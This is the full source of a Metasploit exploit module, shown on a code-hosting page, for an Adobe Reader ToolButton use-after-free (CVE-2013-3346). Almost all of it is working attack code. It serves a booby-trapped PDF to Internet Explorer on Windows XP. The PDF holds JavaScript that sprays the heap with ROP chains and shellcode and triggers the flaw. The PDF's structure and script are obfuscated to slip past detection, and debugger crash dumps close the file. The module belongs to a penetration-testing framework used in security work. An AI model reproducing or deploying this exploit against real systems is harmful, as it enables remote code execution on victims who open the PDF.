Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_toolbutton.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Adobe Reader ToolButton Use After Free",

16
        'Description' => %q{

17
          This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6

18
          and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where

19
          the cEnable callback can be used to early free the object memory. Later use of the object

20
          allows triggering the use after free condition. This module has been tested successfully

21
          on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in

22
          November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order

23
          to exploit Adobe Reader 9 the fileformat version of the exploit can be used.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Soroush Dalili', # Vulnerability discovery

28
          'Unknown', # Exploit in the wild

29
          'sinn3r', # Metasploit module

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-3346' ],

34
          [ 'OSVDB', '96745' ],

35
          [ 'ZDI', '13-212' ],

36
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],

37
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]

38
        ],

39
        'Platform' => 'win',

40
        'Arch' => ARCH_X86,

41
        'Payload' => {

42
          'Space' => 1024,

43
          'BadChars' => "\x00",

44
          'DisableNops' => true

45
        },

46
        'BrowserRequirements' => {

47
          :source => /script|headers/i,

48
          :os_name => OperatingSystems::Match::WINDOWS_XP,

49
          :ua_name => Msf::HttpClients::IE

50
        },

51
        'Targets' => [

52
          [ 'Windows XP / IE / Adobe Reader 10/11', {} ],

53
        ],

54
        'Privileged' => false,

55
        'DisclosureDate' => '2013-08-08',

56
        'DefaultTarget' => 0,

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64
  end

65


66
  def on_request_exploit(cli, request, target_info)

67
    print_status("request: #{request.uri}")

68
    js_data = make_js(cli, target_info)

69
    # Create the pdf

70
    pdf = make_pdf(js_data)

71
    print_status("Sending PDF...")

72
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })

73
  end

74


75
  def make_js(cli, target_info)

76
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain

77
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))

78
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))

79
    escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))

80


81
    js = %Q|

82
function heapSpray(str, str_addr, r_addr) {

83
  var aaa = unescape("%u0c0c");

84
  aaa += aaa;

85
  while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;

86
  var i1 = r_addr - 0x24;

87
  var bbb = aaa.substring(0, i1 / 2);

88
  var sa = str_addr;

89
  while (sa.length < (0x0c0c - r_addr)) sa += sa;

90
  bbb += sa;

91
  bbb += aaa;

92
  var i11 = 0x0c0c - 0x24;

93
  bbb = bbb.substring(0, i11 / 2);

94
  bbb += str;

95
  bbb += aaa;

96
  var i2 = 0x4000 + 0xc000;

97
  var ccc = bbb.substring(0, i2 / 2);

98
  while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;

99
  var i3 = (0x1020 - 0x08) / 2;

100
  var ddd = ccc.substring(0, 0x80000 - i3);

101
  var eee = new Array();

102
  for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";

103
  return;

104
}

105
var shellcode = unescape("#{escaped_payload}");

106
var executable = "";

107
var rop10 = unescape("#{rop_10}");

108
var rop11 = unescape("#{rop_11}");

109
var r11 = false;

110
var vulnerable = true;

111


112
var obj_size;

113
var rop;

114
var ret_addr;

115
var rop_addr;

116
var r_addr;

117


118
if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {

119
  obj_size = 0x360 + 0x1c;

120
  rop = rop10;

121
  rop_addr = unescape("%u08e4%u0c0c");

122
  r_addr = 0x08e4;

123
  ret_addr = unescape("%ua8df%u4a82");

124
} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {

125
  r11 = true;

126
  obj_size = 0x370;

127
  rop = rop11;

128
  rop_addr = unescape("%u08a8%u0c0c");

129
  r_addr = 0x08a8;

130
  ret_addr = unescape("%u8003%u4a84");

131
} else {

132
  vulnerable = false;

133
}

134


135
if (vulnerable) {

136
  var payload = rop + shellcode;

137
  heapSpray(payload, ret_addr, r_addr);

138


139
  var part1 = "";

140
  if (!r11) {

141
    for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");

142
  }

143
  part1 += rop_addr;

144
  var part2 = "";

145
  var part2_len = obj_size - part1.length * 2;

146
  for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");

147
  var arr = new Array();

148


149
  removeButtonFunc = function () {

150
    app.removeToolButton({

151
        cName: "evil"

152
    });

153


154
    for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);

155
  }

156


157
  addButtonFunc = function () {

158
    app.addToolButton({

159
      cName: "xxx",

160
      cExec: "1",

161
      cEnable: "removeButtonFunc();"

162
    });

163
  }

164


165
  app.addToolButton({

166
    cName: "evil",

167
    cExec: "1",

168
    cEnable: "addButtonFunc();"

169
  });

170
}

171
|

172


173
    js

174
  end

175


176
  def random_non_ascii_string(count)

177
    result = ""

178
    count.times do

179
      result << (rand(128) + 128).chr

180
    end

181
    result

182
  end

183


184
  def io_def(id)

185
    "%d 0 obj \n" % id

186
  end

187


188
  def io_ref(id)

189
    "%d 0 R" % id

190
  end

191


192
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

193
  def n_obfu(str)

194
    # return str

195
    result = ""

196
    str.scan(/./u) do |c|

197
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

198
        result << "#%x" % c.unpack("C*")[0]

199
      else

200
        result << c

201
      end

202
    end

203
    result

204
  end

205


206
  def ascii_hex_whitespace_encode(str)

207
    result = ""

208
    whitespace = ""

209
    str.each_byte do |b|

210
      result << whitespace << "%02x" % b

211
      whitespace = " " * (rand(3) + 1)

212
    end

213
    result << ">"

214
  end

215


216
  def make_pdf(js)

217
    xref = []

218
    eol = "\n"

219
    endobj = "endobj" << eol

220


221
    # Randomize PDF version?

222
    pdf = "%PDF-1.5" << eol

223
    pdf << "%" << random_non_ascii_string(4) << eol

224


225
    # catalog

226
    xref << pdf.length

227
    pdf << io_def(1) << n_obfu("<<") << eol

228
    pdf << n_obfu("/Pages ") << io_ref(2) << eol

229
    pdf << n_obfu("/Type /Catalog") << eol

230
    pdf << n_obfu("/OpenAction ") << io_ref(4) << eol

231
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load

232
    pdf << n_obfu("/AcroForm ") << io_ref(6) << eol

233
    pdf << n_obfu(">>") << eol

234
    pdf << endobj

235


236
    # pages array

237
    xref << pdf.length

238
    pdf << io_def(2) << n_obfu("<<") << eol

239
    pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol

240
    pdf << n_obfu("/Count 1") << eol

241
    pdf << n_obfu("/Type /Pages") << eol

242
    pdf << n_obfu(">>") << eol

243
    pdf << endobj

244


245
    # page 1

246
    xref << pdf.length

247
    pdf << io_def(3) << n_obfu("<<") << eol

248
    pdf << n_obfu("/Parent ") << io_ref(2) << eol

249
    pdf << n_obfu("/Type /Page") << eol

250
    pdf << n_obfu(">>") << eol # end obj dict

251
    pdf << endobj

252


253
    # js action

254
    xref << pdf.length

255
    pdf << io_def(4) << n_obfu("<<")

256
    pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)

257
    pdf << n_obfu(">>") << eol

258
    pdf << endobj

259


260
    # js stream

261
    xref << pdf.length

262
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

263
    pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

264
    pdf << "stream" << eol

265
    pdf << compressed << eol

266
    pdf << "endstream" << eol

267
    pdf << endobj

268


269
    ###

270
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load

271
    ###

272


273
    # form object

274
    xref << pdf.length

275
    pdf << io_def(6)

276
    pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol

277
    pdf << endobj

278


279
    # form stream

280
    xfa = <<~EOF

281
      <?xml version="1.0" encoding="UTF-8"?>

282
      <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">

283
      <config xmlns="http://www.xfa.org/schema/xci/2.6/">

284
      <present><pdf><interactive>1</interactive></pdf></present>

285
      </config>

286
      <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">

287
      <subform name="form1" layout="tb" locale="en_US">

288
      <pageSet></pageSet>

289
      </subform></template></xdp:xdp>

290
    EOF

291


292
    xref << pdf.length

293
    pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.length) << eol

294
    pdf << "stream" << eol

295
    pdf << xfa << eol

296
    pdf << "endstream" << eol

297
    pdf << endobj

298


299
    ###

300
    # end form stuff for icucnv36.dll / icucnv40.dll

301
    ###

302


303
    # trailing stuff

304
    xrefPosition = pdf.length

305
    pdf << "xref" << eol

306
    pdf << "0 %d" % (xref.length + 1) << eol

307
    pdf << "0000000000 65535 f" << eol

308
    xref.each do |index|

309
      pdf << "%010d 00000 n" % index << eol

310
    end

311


312
    pdf << "trailer" << eol

313
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

314


315
    pdf << "startxref" << eol

316
    pdf << xrefPosition.to_s() << eol

317


318
    pdf << "%%EOF" << eol

319
    pdf

320
  end

321
end

322


323
=begin

324


325
* crash Adobe Reader 10.1.4

326


327
First chance exceptions are reported before any exception handling.

328
This exception may be expected and handled.

329
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001

330
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0         nv up ei pl nz ac po cy

331
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213

332
AcroRd32_60000000!PDFLTerm+0xbb7cd:

333
604d3a4d ff9028030000    call    dword ptr [eax+328h] ds:0023:0c0c0c0c=????????

334


335
* crash Adobe Reader 11.0.2

336


337
(940.d70): Access violation - code c0000005 (first chance)

338
First chance exceptions are reported before any exception handling.

339
This exception may be expected and handled.

340
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -

341
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000

342
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0         nv up ei pl nz ac po cy

343
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210213

344
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:

345
60197b9b ff9064030000    call    dword ptr [eax+364h] ds:0023:0c0c0c0c=????????

346


347
=end

348


349